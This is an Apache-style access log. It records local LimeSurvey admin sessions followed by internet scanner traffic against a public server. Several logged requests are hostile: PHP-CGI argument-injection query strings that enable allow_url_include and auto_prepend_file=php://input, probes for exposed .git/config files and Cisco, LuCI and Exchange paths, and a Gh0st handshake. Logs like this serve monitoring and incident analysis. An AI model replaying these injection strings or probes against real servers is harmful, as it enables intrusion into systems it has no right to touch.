::1 - - [06/Nov/2025:22:56:39 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=collapsed&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 21296
::1 - - [06/Nov/2025:22:56:39 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=side&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 37577
::1 - - [06/Nov/2025:22:56:48 +0300] "GET /limesurvey/index.php/admin/statistics/sa/simpleStatistics/surveyid/226469 HTTP/1.1" 200 99160
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/e6c0977a/dist/dom-to-image.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/c00ef0/es6-promise.auto.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/ee83a977/jspdf.es.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/143f40ac/vendor/FileSaver.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/ee83a977/jspdf.umd.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/f71522b7/chart.umd.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/bcbeb3ae/statistics.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/bf1ae3c4/json2.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/bcbeb3ae/createpdf_worker.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/tmp/assets/143f40ac/dist/jszip.min.js HTTP/1.1" 304 -
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=side&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 37577
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxQuestionGroupArray?surveyid=226469&&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 4620
::1 - - [06/Nov/2025:22:56:49 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=collapsed&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 21296
::1 - - [06/Nov/2025:22:56:50 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=side&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 37577
::1 - - [06/Nov/2025:22:56:55 +0300] "GET /limesurvey/index.php/responses/browse?surveyId=226469&1762459015857 HTTP/1.1" 200 125509
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/55ff470d/browse.css HTTP/1.1" 200 1277
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/beee38c9/pager.css HTTP/1.1" 200 880
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/32fc7426/gridview/jquery.yiigridview.js HTTP/1.1" 200 17604
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/2954a524/jquery.ba-bbq.min.js HTTP/1.1" 200 7368
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/bcbeb3ae/listresponse.js HTTP/1.1" 200 3990
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/bcbeb3ae/tokens.js HTTP/1.1" 200 23971
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/e70bdc2b/listActions.js HTTP/1.1" 200 13899
::1 - - [06/Nov/2025:22:56:56 +0300] "GET /limesurvey/tmp/assets/fce83746/gridScrollbar.js HTTP/1.1" 200 2334
::1 - - [06/Nov/2025:22:56:57 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxQuestionGroupArray?surveyid=226469&&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 4620
::1 - - [06/Nov/2025:22:56:57 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=side&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 37577
::1 - - [06/Nov/2025:22:56:57 +0300] "GET /limesurvey/index.php/surveyAdministration/getAjaxMenuArray?surveyid=226469&position=collapsed&YII_CSRF_TOKEN=b0J2ZWtZVXczeWNPY2lDcmJUWTBETXc5UmZRY2Uwc2n6c57oFlVUBL7f9sAV5R4oRPpObKaG9WoSMI8aq2hEMA%3D%3D HTTP/1.1" 200 21296
::1 - - [06/Nov/2025:22:57:12 +0300] "GET /limesurvey/index.php/admin/notification?sa=actionGetMenuWidget&surveyId=226469 HTTP/1.1" 200 2487
::1 - - [06/Nov/2025:22:57:42 +0300] "GET /limesurvey/index.php/userManagement/index HTTP/1.1" 200 109198
::1 - - [06/Nov/2025:22:57:43 +0300] "GET /limesurvey/tmp/assets/eb3bda4b/css/usermanagement.css HTTP/1.1" 200 21678
::1 - - [06/Nov/2025:22:57:43 +0300] "GET /limesurvey/tmp/assets/eb3bda4b/js/usermanagement.js HTTP/1.1" 200 16411
::1 - - [06/Nov/2025:22:57:43 +0300] "GET /limesurvey/tmp/assets/c44fa1b0/action_dropdown.js HTTP/1.1" 200 2513
::1 - - [06/Nov/2025:22:57:43 +0300] "GET /limesurvey/tmp/assets/fce83746/rowLink.js HTTP/1.1" 200 464
142.93.171.86 - - [06/Nov/2025:23:03:25 +0300] "GET /prod/.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
142.93.171.86 - - [06/Nov/2025:23:03:27 +0300] "GET /prod/.git/config HTTP/1.1" 404 299
91.232.238.112 - - [06/Nov/2025:23:07:57 +0300] "GET / HTTP/1.0" 400 468
44.201.177.43 - - [06/Nov/2025:23:14:56 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [06/Nov/2025:23:14:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
40.124.175.226 - - [06/Nov/2025:23:21:05 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 zgrab/0.x"
164.92.249.25 - - [06/Nov/2025:23:21:44 +0300] "GET /+CSCOL+/Java.jar HTTP/1.1" 404 299
164.92.249.25 - - [06/Nov/2025:23:21:44 +0300] "GET /+CSCOE+/logon_forms.js HTTP/1.1" 404 299
164.92.249.25 - - [06/Nov/2025:23:21:44 +0300] "GET /+CSCOL+/a1.jar HTTP/1.1" 404 299
164.92.249.25 - - [06/Nov/2025:23:21:45 +0300] "GET /+CSCOE+/transfer.js HTTP/1.1" 404 299
91.232.238.112 - - [06/Nov/2025:23:21:49 +0300] "GET /robots.txt HTTP/1.1" 404 299
3.145.49.236 - - [06/Nov/2025:23:25:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [06/Nov/2025:23:25:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
123.143.114.188 - - [06/Nov/2025:23:30:01 +0300] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 500 635 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
123.143.114.188 - - [06/Nov/2025:23:30:02 +0300] "POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
123.143.114.188 - - [06/Nov/2025:23:30:02 +0300] "POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
123.143.114.188 - - [06/Nov/2025:23:30:03 +0300] "POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
3.145.49.236 - - [06/Nov/2025:23:46:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [06/Nov/2025:23:46:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [06/Nov/2025:23:48:09 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.146.107.169 - - [06/Nov/2025:23:56:54 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [06/Nov/2025:23:56:55 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:01:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:01:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:00:14:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:00:14:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:14:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:14:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:00:17:27 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
204.76.203.212 - - [07/Nov/2025:00:19:42 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [07/Nov/2025:00:19:56 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
204.76.203.18 - - [07/Nov/2025:00:26:26 +0300] "GET /backup/ HTTP/1.1" 404 298 "-" "-"
3.146.107.169 - - [07/Nov/2025:00:29:16 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:00:29:16 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.67.33.207 - - [07/Nov/2025:00:31:50 +0300] "GET /axis2/services/listServices HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
44.201.177.43 - - [07/Nov/2025:00:32:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:00:32:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:41:41 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:41:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:00:42:14 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:00:42:14 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.79.180.31 - - [07/Nov/2025:00:43:03 +0300] "GET / HTTP/1.1" 302 -
3.146.107.169 - - [07/Nov/2025:00:50:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:00:50:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:00:52:06 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:00:53:42 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:00:53:43 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:00:59:30 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
142.93.171.86 - - [07/Nov/2025:01:06:36 +0300] "GET /app/.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
142.93.171.86 - - [07/Nov/2025:01:06:37 +0300] "GET /app/.git/config HTTP/1.1" 404 299
85.11.167.4 - - [07/Nov/2025:01:07:50 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [07/Nov/2025:01:07:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [07/Nov/2025:01:07:50 +0300] "GET /dashboard/javascripts/modernizr.js HTTP/1.1" 200 51365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [07/Nov/2025:01:07:51 +0300] "GET //code.jquery.com/jquery-1.10.2.min.js HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
85.11.167.4 - - [07/Nov/2025:01:07:51 +0300] "GET /dashboard/javascripts/all.js HTTP/1.1" 200 188385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
3.145.49.236 - - [07/Nov/2025:01:07:59 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:07:59 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:01:14:46 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:01:14:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:17:18 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:17:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:01:19:52 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
44.201.177.43 - - [07/Nov/2025:01:20:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:01:20:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
198.235.24.218 - - [07/Nov/2025:01:25:48 +0300] "GET / HTTP/1.0" 302 119 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
3.145.49.236 - - [07/Nov/2025:01:33:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:33:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
35.203.210.54 - - [07/Nov/2025:01:37:17 +0300] "GET / HTTP/1.1" 302 -
35.203.210.54 - - [07/Nov/2025:01:37:18 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [07/Nov/2025:01:42:02 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:42:03 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:01:43:21 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:01:43:22 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
87.236.176.14 - - [07/Nov/2025:01:44:28 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.14 - - [07/Nov/2025:01:44:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.120 - - [07/Nov/2025:01:44:29 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
204.76.203.219 - - [07/Nov/2025:01:55:34 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:01:59:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:01:59:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
66.240.205.34 - - [07/Nov/2025:02:03:20 +0300] "Gh0st\xad" 400 325 "-" "-"
44.201.177.43 - - [07/Nov/2025:02:06:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:02:06:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
205.210.31.53 - - [07/Nov/2025:02:09:04 +0300] "GET / HTTP/1.1" 302 -
205.210.31.53 - - [07/Nov/2025:02:09:05 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
185.12.59.118 - - [07/Nov/2025:02:13:23 +0300] "GET / HTTP/1.1" 302 -
185.12.59.118 - - [07/Nov/2025:02:13:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
193.142.147.209 - - [07/Nov/2025:02:14:03 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.146.107.169 - - [07/Nov/2025:02:15:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:02:15:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
142.93.171.86 - - [07/Nov/2025:02:19:44 +0300] "GET /application/.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
142.93.171.86 - - [07/Nov/2025:02:19:44 +0300] "GET /application/.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:02:21:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:02:21:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.221.57.26 - - [07/Nov/2025:02:27:11 +0300] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 299
44.201.177.43 - - [07/Nov/2025:02:28:33 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:02:28:33 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.100.233.188 - - [07/Nov/2025:02:30:55 +0300] "GET /admin/config.php HTTP/1.0" 404 294
3.146.107.169 - - [07/Nov/2025:02:31:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [07/Nov/2025:02:31:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:02:34:37 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
185.100.233.188 - - [07/Nov/2025:02:35:14 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
3.145.49.236 - - [07/Nov/2025:02:38:41 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:02:38:41 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:02:42:34 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:02:42:35 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.67.33.207 - - [07/Nov/2025:02:48:09 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
142.93.171.86 - - [07/Nov/2025:02:52:58 +0300] "GET /frontend/.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
142.93.171.86 - - [07/Nov/2025:02:52:59 +0300] "GET /frontend/.git/config HTTP/1.1" 404 299
3.145.49.236 - - [07/Nov/2025:02:58:16 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:02:58:16 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:00:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:00:38 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.203.59.1 - - [07/Nov/2025:03:02:04 +0300] "GET / HTTP/1.1" 302 -
78.135.107.199 - - [07/Nov/2025:03:06:58 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
193.142.147.209 - - [07/Nov/2025:03:11:17 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
82.202.180.163 - - [07/Nov/2025:03:13:06 +0300] "GET /admin/config.php HTTP/1.0" 404 294
3.145.49.236 - - [07/Nov/2025:03:13:54 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:13:54 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:25:29 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:25:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
82.202.180.163 - - [07/Nov/2025:03:30:42 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
204.76.203.212 - - [07/Nov/2025:03:32:10 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:03:37:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:37:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:40:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:40:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:53:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:03:53:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:55:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:03:55:28 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
34.38.38.180 - - [07/Nov/2025:04:02:02 +0300] "GET / HTTP/1.1" 302 - "-" "python-requests/2.32.5"
20.29.8.147 - - [07/Nov/2025:04:02:25 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 299
193.142.147.209 - - [07/Nov/2025:04:03:51 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [07/Nov/2025:04:05:13 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:04:05:13 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [07/Nov/2025:04:11:02 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [07/Nov/2025:04:26:07 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [07/Nov/2025:04:26:07 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:04:43:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [07/Nov/2025:04:43:55 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [07/Nov/2025:04:47:08 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
45.185.68.245 - - [07/Nov/2025:04:50:55 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
3.146.107.169 - - [07/Nov/2025:04:53:12 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
